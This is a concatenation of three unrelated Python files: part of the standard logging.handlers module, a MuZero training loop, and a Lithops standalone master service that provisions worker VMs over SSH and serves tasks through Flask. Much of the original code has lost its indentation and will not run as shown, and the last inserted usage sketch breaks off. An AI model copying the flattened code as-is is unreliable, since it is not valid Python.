prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if not self.socket:
self.createSocket()
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
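# Illustrative sketch (not part of the original module): logging to the local
# syslog daemon over its Unix domain socket, and to a remote collector over
# UDP. The address values are examples only.
def _demo_syslog_handlers():
    demo_logger = logging.getLogger('demo.syslog')
    local_handler = SysLogHandler(address='/dev/log',
                                  facility=SysLogHandler.LOG_DAEMON)
    remote_handler = SysLogHandler(address=('syslog.example.com', SYSLOG_UDP_PORT))
    demo_logger.addHandler(local_handler)
    demo_logger.addHandler(remote_handler)
    demo_logger.warning('priority/facility encoded by encodePriority()')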
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
        default is 5 seconds).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
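# Illustrative sketch (not part of the original module): emailing only CRITICAL
# records. The mail host, addresses and credentials are placeholder values.
def _demo_smtp_handler():
    handler = SMTPHandler(mailhost=('smtp.example.com', 587),
                          fromaddr='alerts@example.com',
                          toaddrs=['ops@example.com'],
                          subject='Application alert',
                          credentials=('alerts@example.com', 'app-password'),
                          secure=())  # empty tuple -> plain starttls()
    handler.setLevel(logging.CRITICAL)
    logging.getLogger('demo.smtp').addHandler(handler)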
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
        that is sent as the CGI data. Override this in a subclass if needed.
Contributed by Franz Glasner.
"""
return record.__dict__
def getConnection(self, host, secure):
"""
        Get an HTTP[S]Connection.
Override when a custom connection is required, for example if
there is a proxy.
"""
import http.client
if secure:
connection = http.client.HTTPSConnection(host, context=self.context)
else:
connection = http.client.HTTPConnection(host)
return connection
def emit(self, record):
"""
Emit a record.
Send the record to the web server as a percent-encoded dictionary
"""
try:
import urllib.parse
host = self.host
h = self.getConnection(host, self.secure)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
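# Illustrative sketch (not part of the original module): POSTing each record as
# a percent-encoded form to a web endpoint. Host and URL are example values.
def _demo_http_handler():
    handler = HTTPHandler('logs.example.com:8080', '/ingest', method='POST')
    demo_logger = logging.getLogger('demo.http')
    demo_logger.addHandler(handler)
    demo_logger.info('sent as application/x-www-form-urlencoded')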
class BufferingHandler(logging.Handler):
"""
    A handler class which buffers logging records in memory. Whenever a
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.acquire()
try:
self.target = target
finally:
self.release()
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
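# Illustrative sketch (not part of the original module): buffering records in
# memory and only writing them out once an ERROR (or worse) shows up. The
# target handler and file name are example values.
def _demo_memory_handler():
    target = logging.FileHandler('buffered.log')
    buffered = MemoryHandler(capacity=200, flushLevel=logging.ERROR, target=target)
    demo_logger = logging.getLogger('demo.memory')
    demo_logger.setLevel(logging.DEBUG)
    demo_logger.addHandler(buffered)
    demo_logger.debug('held in the buffer')
    demo_logger.error('this flushes the buffered records to buffered.log')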
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepare a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message and
arguments, and removes unpickleable items from the record in-place.
Specifically, it overwrites the record's `msg` and
`message` attributes with the merged message (obtained by
calling the handler's `format` method), and sets the `args`,
`exc_info` and `exc_text` attributes to None.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
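# Illustrative sketch (not part of the original module): the usual
# QueueHandler/QueueListener pairing, where producers only pay the cost of a
# put_nowait() and a single listener thread fans records out to the real
# (possibly slow) handlers.
def _demo_queue_logging():
    log_queue = queue.Queue(-1)
    demo_logger = logging.getLogger('demo.queue')
    demo_logger.addHandler(QueueHandler(log_queue))
    listener = QueueListener(log_queue, logging.StreamHandler(),
                             respect_handler_level=True)
    listener.start()
    demo_logger.warning('enqueued by QueueHandler, emitted by the listener thread')
    listener.stop()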
|
trainer.py
|
import time
from games.base_classes import MuZeroConfigBase
from threading import Thread
from torch.utils.tensorboard import SummaryWriter
import numpy
import torch
import models
class Trainer:
"""
    Class which runs in a dedicated thread to train a neural network and save its weights to the shared storage.
"""
def __init__(self, initial_weights, config):
self.config: MuZeroConfigBase = config
self.training_step = 0
self.writer = SummaryWriter(self.config.results_path / "trainer")
# Initialize the network
self.model = models.MuZeroExtendedNetwork(
self.config.observation_shape,
len(self.config.action_space),
self.config.encoding_size,
self.config.hidden_size,
)
self.model.set_weights(initial_weights)
self.model.to(torch.device(config.training_device))
self.model.train()
self.optimizer = torch.optim.SGD(
self.model.parameters(),
lr=self.config.lr_init,
momentum=self.config.momentum,
weight_decay=self.config.weight_decay,
)
        def async_put_weights():
            # Publish the latest weights whenever a new training step has
            # completed and the consumers have drained the previous entry.
            last_idx = None
            while True:
                if self.config.q_weights.empty() and self.training_step != last_idx:
                    weights = self.model.get_weights()
                    last_idx = self.training_step
                    self.config.q_weights.put(weights)
                else:
                    # Avoid busy-waiting when there is nothing new to publish.
                    time.sleep(0.1)
Thread(target=async_put_weights).start()
self.continuous_update_weights()
def continuous_update_weights(self):
# Wait for the replay buffer to be filled
while self.config.v_self_play_count.value < 1:
time.sleep(1)
# Training loop
while True:
batch = self.config.q_replay_batch.get()
total_loss, value_loss, reward_loss, policy_loss = self.update_weights(
batch
)
# Save to the shared storage
if self.training_step % self.config.checkpoint_interval == 0:
self.config.q_weights.put(self.model.get_weights())
self.config.v_training_step.value = self.training_step
self.writer.add_scalar(
"2.Workers/Training steps", self.training_step, self.training_step
)
self.writer.add_scalar(
"3.Loss/1.Total loss", total_loss, self.training_step
)
self.writer.add_scalar("3.Loss/Value loss", value_loss, self.training_step)
self.writer.add_scalar(
"3.Loss/Reward loss", reward_loss, self.training_step
)
self.writer.add_scalar(
"3.Loss/Policy loss", policy_loss, self.training_step
)
if self.config.training_delay:
time.sleep(self.config.training_delay)
def update_weights(self, batch):
"""
Perform one training step.
"""
self.update_lr()
(
observation_batch,
action_batch,
target_value,
target_reward,
target_policy,
) = batch
device = next(self.model.parameters()).device
observation_batch = torch.tensor(observation_batch).float().to(device)
action_batch = torch.tensor(action_batch).float().to(device).unsqueeze(-1)
target_value = torch.tensor(target_value).float().to(device)
target_reward = torch.tensor(target_reward).float().to(device)
target_policy = torch.tensor(target_policy).float().to(device)
value, reward, policy_logits, hidden_state = self.model.initial_inference(
observation_batch
)
predictions = [(value, reward, policy_logits)]
for action_i in range(self.config.num_unroll_steps):
value, reward, policy_logits, hidden_state = self.model.recurrent_inference(
# todo : check here! can we set previous_actions with empty list?
hidden_state, action_batch[:, action_i], []
)
predictions.append((value, reward, policy_logits))
# Compute losses
value_loss, reward_loss, policy_loss = (0, 0, 0)
for i, prediction in enumerate(predictions):
value, reward, policy_logits = prediction
(
current_value_loss,
current_reward_loss,
current_policy_loss,
) = loss_function(
value.squeeze(-1),
reward.squeeze(-1),
policy_logits,
target_value[:, i],
target_reward[:, i],
target_policy[:, i, :],
)
value_loss += current_value_loss
reward_loss += current_reward_loss
policy_loss += current_policy_loss
loss = (value_loss + reward_loss + policy_loss).mean()
# Scale gradient by number of unroll steps (See paper Training appendix)
loss.register_hook(lambda grad: grad * 1 / self.config.num_unroll_steps)
# Optimize
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.training_step += 1
return (
loss.item(),
value_loss.mean().item(),
reward_loss.mean().item(),
policy_loss.mean().item(),
)
def update_lr(self):
"""
Update learning rate
"""
lr = self.config.lr_init * self.config.lr_decay_rate ** (
self.training_step / self.config.lr_decay_steps
)
for param_group in self.optimizer.param_groups:
param_group["lr"] = lr
def loss_function(value, reward, policy_logits, target_value, target_reward, target_policy):
# TODO: paper promotes cross entropy instead of MSE
value_loss = torch.nn.MSELoss()(value, target_value)
reward_loss = torch.nn.MSELoss()(reward, target_reward)
policy_loss = torch.mean(torch.sum(-target_policy * torch.nn.LogSoftmax(dim=1)(policy_logits), 1))
return value_loss, reward_loss, policy_loss
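# Illustrative sketch (not part of this project's code): exercising
# loss_function() on dummy tensors with the shapes update_weights() feeds it,
# i.e. 1-D value/reward tensors and (batch, num_actions) policy tensors.
def _demo_loss_function():
    batch_size, num_actions = 4, 3
    value = torch.zeros(batch_size)
    reward = torch.zeros(batch_size)
    policy_logits = torch.zeros(batch_size, num_actions)
    target_value = torch.ones(batch_size)
    target_reward = torch.ones(batch_size)
    target_policy = torch.full((batch_size, num_actions), 1.0 / num_actions)
    v_loss, r_loss, p_loss = loss_function(
        value, reward, policy_logits, target_value, target_reward, target_policy
    )
    # MSE of zeros against ones is 1.0; the policy term is the cross entropy of
    # a uniform target against uniform logits, i.e. log(num_actions).
    print(v_loss.item(), r_loss.item(), p_loss.item())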
|
master.py
|
#
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import copy
import time
import json
import uuid
import flask
import queue
import logging
import multiprocessing as mp
from pathlib import Path
from gevent.pywsgi import WSGIServer
from concurrent.futures import ThreadPoolExecutor
from lithops.constants import LITHOPS_TEMP_DIR, STANDALONE_LOG_FILE, JOBS_DIR,\
STANDALONE_SERVICE_PORT, STANDALONE_CONFIG_FILE, STANDALONE_INSTALL_DIR
from lithops.localhost.localhost import LocalhostHandler
from lithops.utils import verify_runtime_name, iterchunks, setup_lithops_logger
from lithops.standalone.utils import get_worker_setup_script
from lithops.standalone.keeper import BudgetKeeper
setup_lithops_logger(logging.DEBUG, filename=STANDALONE_LOG_FILE)
logger = logging.getLogger('lithops.standalone.master')
app = flask.Flask(__name__)
INSTANCE_START_TIMEOUT = 200
MAX_INSTANCE_CREATE_RETRIES = 3
STANDALONE_CONFIG = None
STANDALONE_HANDLER = None
BUDGET_KEEPER = None
JOB_PROCESSES = {}
WORK_QUEUES = {}
MASTER_IP = None
MP_MANAGER = mp.Manager()
LOCALHOST_MANAGER_PROCESS = None
EXEC_MODE = 'consume'
WORKERS = MP_MANAGER.list()
def is_worker_instance_ready(vm):
"""
Checks if the VM instance is ready to receive ssh connections
"""
try:
vm.get_ssh_client().run_remote_command('id')
except Exception as e:
logger.debug('ssh to {} failed: {}'
.format(vm.ip_address, e))
vm.del_ssh_client()
return False
return True
def wait_worker_instance_ready(vm):
"""
Waits until the VM instance is ready to receive ssh connections
"""
logger.info('Waiting {} to become ready'.format(vm))
start = time.time()
while(time.time() - start < INSTANCE_START_TIMEOUT):
if is_worker_instance_ready(vm):
logger.info('{} ready in {} seconds'
.format(vm, round(time.time()-start, 2)))
return True
time.sleep(5)
msg = 'Readiness probe expired on {}'.format(vm)
logger.error(msg)
raise TimeoutError(msg)
def setup_worker(worker_info, work_queue, job_key, workers):
"""
    Sets up a worker VM: waits for the instance to become ready, uploads the
    Lithops package and submits the installation/startup script so the worker
    can start consuming tasks from the job's work queue.
"""
instance_name, ip_address, instance_id, ssh_credentials = worker_info
logger.info('Starting setup for VM instance {}'.format(instance_name))
vm = STANDALONE_HANDLER.backend.get_vm(instance_name)
vm.ip_address = ip_address
vm.instance_id = instance_id
vm.ssh_credentials = ssh_credentials
worker_ready = False
retry = 0
logger.info('Queue empty: {} - Queue size: {}'
.format(work_queue.empty(), work_queue.qsize()))
while(not worker_ready and not work_queue.empty()
and retry < MAX_INSTANCE_CREATE_RETRIES):
try:
wait_worker_instance_ready(vm)
worker_ready = True
except TimeoutError: # VM not started in time
if retry == MAX_INSTANCE_CREATE_RETRIES:
msg = '{} readiness probe failed after {} retries.'.format(vm, retry)
logger.debug(msg)
raise Exception(msg)
logger.info('Recreating VM instance {}'.format(vm.name))
retry += 1
vm.delete()
vm.create()
if work_queue.empty():
logger.info('Work queue is already empty. Skipping {}'.format(vm))
return
# upload zip lithops package
logger.info('Uploading lithops files to {}'.format(vm))
vm.get_ssh_client().upload_local_file('/opt/lithops/lithops_standalone.zip',
'/tmp/lithops_standalone.zip')
logger.info('Executing lithops installation process on {}'.format(vm))
vm_data = {'instance_name': vm.name,
'ip_address': vm.ip_address,
'instance_id': vm.instance_id,
'master_ip': MASTER_IP,
'job_key': job_key}
script = get_worker_setup_script(STANDALONE_CONFIG, vm_data)
vm.get_ssh_client().run_remote_command(script, run_async=True)
vm.del_ssh_client()
logger.info('Installation script submitted to {}'.format(vm))
logger.debug(f'Appending to WORKERS {vm_data}')
workers.append(vm_data)
def stop_job_process(job_key):
"""
Stops a job process
"""
global JOB_PROCESSES
done = os.path.join(JOBS_DIR, job_key+'.done')
Path(done).touch()
if job_key in JOB_PROCESSES and JOB_PROCESSES[job_key].is_alive():
JOB_PROCESSES[job_key].terminate()
logger.info('Finished job {} invocation'.format(job_key))
del JOB_PROCESSES[job_key]
def run_job_local(work_queue):
"""
Localhost jobs manager process for consume mode
"""
pull_runtime = STANDALONE_CONFIG.get('pull_runtime', False)
try:
        localhost_handler = LocalhostHandler({'pull_runtime': pull_runtime})
while True:
job_payload = work_queue.get()
job_payload['config']['lithops']['backend'] = 'localhost'
            localhost_handler.invoke(job_payload)
except Exception as e:
logger.error(e)
def run_job_worker(job_payload, work_queue, workers_list):
"""
Process responsible to wait for workers to become ready, and
submit individual tasks of the job to them
"""
job_key = job_payload['job_key']
call_ids = job_payload['call_ids']
chunksize = job_payload['chunksize']
workers = job_payload['worker_instances']
for call_ids_range in iterchunks(call_ids, chunksize):
task_payload = copy.deepcopy(job_payload)
dbr = task_payload['data_byte_ranges']
task_payload['call_ids'] = call_ids_range
task_payload['data_byte_ranges'] = [dbr[int(call_id)] for call_id in call_ids_range]
work_queue.put(task_payload)
logger.info("Total tasks in {} work queue: {}".format(job_key, work_queue.qsize()))
# run setup only in case not reusing old workers
if workers:
with ThreadPoolExecutor(len(workers)) as executor:
for worker_info in workers:
executor.submit(setup_worker, worker_info, work_queue, job_key, workers_list)
logger.info('All workers set up for job {}'.format(job_key))
while not work_queue.empty():
time.sleep(1)
done = os.path.join(JOBS_DIR, job_key+'.done')
Path(done).touch()
logger.info('Finished job {} invocation.'.format(job_key))
def error(msg):
response = flask.jsonify({'error': msg})
response.status_code = 404
return response
@app.route('/workers', methods=['GET'])
def get_workers():
"""
    Returns metadata for the spawned workers that are currently reachable
TODO - add support to list only available workers when each worker updates itself in WORKERS via POST
TODO - job.done for master is not same as job.done for worker, can be improved by touch on master from worker instead of touch on master
"""
logger.debug(f'in get_workers, workers = {WORKERS}')
workers = []
for w in WORKERS:
vm = STANDALONE_HANDLER.backend.get_vm(w['instance_name'])
vm.ip_address = w['ip_address']
vm.instance_id = w['instance_id']
if is_worker_instance_ready(vm):
workers.append(w)
else:
            # Delete the worker if it is not reachable. This also covers edge cases where the keeper did not start on the worker.
vm.delete()
response = flask.jsonify(workers)
response.status_code = 200
return response
@app.route('/get-task/<job_key>', methods=['GET'])
def get_task(job_key):
"""
Returns a task from the work queue
"""
global WORK_QUEUES
global JOB_PROCESSES
try:
task_payload = WORK_QUEUES.setdefault(job_key, MP_MANAGER.Queue()).get(timeout=0.1)
response = flask.jsonify(task_payload)
response.status_code = 200
logger.info('Calls {} invoked on {}'
.format(', '.join(task_payload['call_ids']),
flask.request.remote_addr))
except queue.Empty:
if EXEC_MODE != 'reuse':
stop_job_process(job_key)
response = ('', 204)
return response
@app.route('/clear', methods=['POST'])
def clear():
"""
Stops received job processes
"""
global JOB_PROCESSES
job_key_list = flask.request.get_json(force=True, silent=True)
for job_key in job_key_list:
if job_key in JOB_PROCESSES and JOB_PROCESSES[job_key].is_alive():
logger.info('Received SIGTERM: Stopping job process {}'
.format(job_key))
stop_job_process(job_key)
return ('', 204)
@app.route('/run', methods=['POST'])
def run():
"""
    Runs a job. In consume mode the job runs locally on the master VM; in create and reuse modes it is dispatched to worker VMs.
"""
global BUDGET_KEEPER
global WORK_QUEUES
global JOB_PROCESSES
global WORKERS
global EXEC_MODE
global LOCALHOST_MANAGER_PROCESS
job_payload = flask.request.get_json(force=True, silent=True)
if job_payload and not isinstance(job_payload, dict):
return error('The action did not receive a dictionary as an argument.')
try:
runtime = job_payload['runtime_name']
verify_runtime_name(runtime)
except Exception as e:
return error(str(e))
job_key = job_payload['job_key']
logger.info('Received job {}'.format(job_key))
BUDGET_KEEPER.last_usage_time = time.time()
BUDGET_KEEPER.update_config(job_payload['config']['standalone'])
BUDGET_KEEPER.jobs[job_key] = 'running'
EXEC_MODE = job_payload['config']['standalone'].get('exec_mode', 'consume')
if EXEC_MODE == 'consume':
work_queue = WORK_QUEUES.setdefault('local', MP_MANAGER.Queue())
if not LOCALHOST_MANAGER_PROCESS:
logger.debug('Starting manager process for localhost jobs')
lmp = mp.Process(target=run_job_local, args=(work_queue,))
lmp.daemon = True
lmp.start()
LOCALHOST_MANAGER_PROCESS = lmp
logger.info(f'Putting job {job_key} into master queue')
work_queue.put(job_payload)
elif EXEC_MODE == 'create':
# Create mode runs the job in worker VMs
logger.debug(f'Starting process for job {job_key}')
work_queue = MP_MANAGER.Queue()
WORK_QUEUES[job_key] = work_queue
jp = mp.Process(target=run_job_worker, args=(job_payload, work_queue, WORKERS))
jp.daemon = True
jp.start()
JOB_PROCESSES[job_key] = jp
elif EXEC_MODE == 'reuse':
# Reuse mode runs the job on running workers
        # TODO: Consider adding support to manage the pool of available workers
# TODO: Spawn only the missing delta of workers
logger.debug(f'Starting process for job {job_key}')
work_queue = WORK_QUEUES.setdefault('all', MP_MANAGER.Queue())
jp = mp.Process(target=run_job_worker, args=(job_payload, work_queue, WORKERS))
jp.daemon = True
jp.start()
JOB_PROCESSES[job_key] = jp
act_id = str(uuid.uuid4()).replace('-', '')[:12]
response = flask.jsonify({'activationId': act_id})
response.status_code = 202
return response
@app.route('/ping', methods=['GET'])
def ping():
response = flask.jsonify({'response': 'pong'})
response.status_code = 200
return response
@app.route('/preinstalls', methods=['GET'])
def preinstalls():
payload = flask.request.get_json(force=True, silent=True)
if payload and not isinstance(payload, dict):
return error('The action did not receive a dictionary as an argument.')
try:
runtime = payload['runtime']
verify_runtime_name(runtime)
except Exception as e:
return error(str(e))
pull_runtime = STANDALONE_CONFIG.get('pull_runtime', False)
localhost_handler = LocalhostHandler({'runtime': runtime, 'pull_runtime': pull_runtime})
localhost_handler.init()
runtime_meta = localhost_handler.create_runtime(runtime)
localhost_handler.clear()
logger.info(runtime_meta)
response = flask.jsonify(runtime_meta)
response.status_code = 200
return response
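# Illustrative sketch (not part of this module): how a client on the master's
# network might exercise the HTTP API defined above. The master IP is a
# placeholder value; real job payloads are built and POSTed by Lithops itself.
def _demo_master_client(master_ip='10.0.0.2'):
    import requests
    base = 'http://{}:{}'.format(master_ip, STANDALONE_SERVICE_PORT)
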